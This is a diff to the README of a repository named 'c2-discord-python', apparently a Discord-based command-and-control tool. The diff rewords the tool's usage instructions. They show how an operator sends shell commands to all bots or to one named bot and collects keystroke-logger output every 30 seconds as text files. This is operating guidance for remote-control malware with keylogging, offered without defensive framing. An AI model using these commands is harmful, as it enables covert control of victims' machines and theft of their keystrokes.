r3dsweater/c2-discord-python/README.md

 <br>

-In the follow code all bots will return stdout from the shell command.
+In the following example all bots will return stdout from the shell command.

 <code> $b $shell dir *.png </code>

-If want specify just a target you can do this:
+Or if you want to interact with only one specific bot:

  <code>$Bot-name $shell dir *.png</code>

 ---
-Get the key logger every 30 seconds.
+Get the keystroke logger every 30 seconds.
 The bot will send to you in a .txt format:

 <code>$b $klogging 30</code>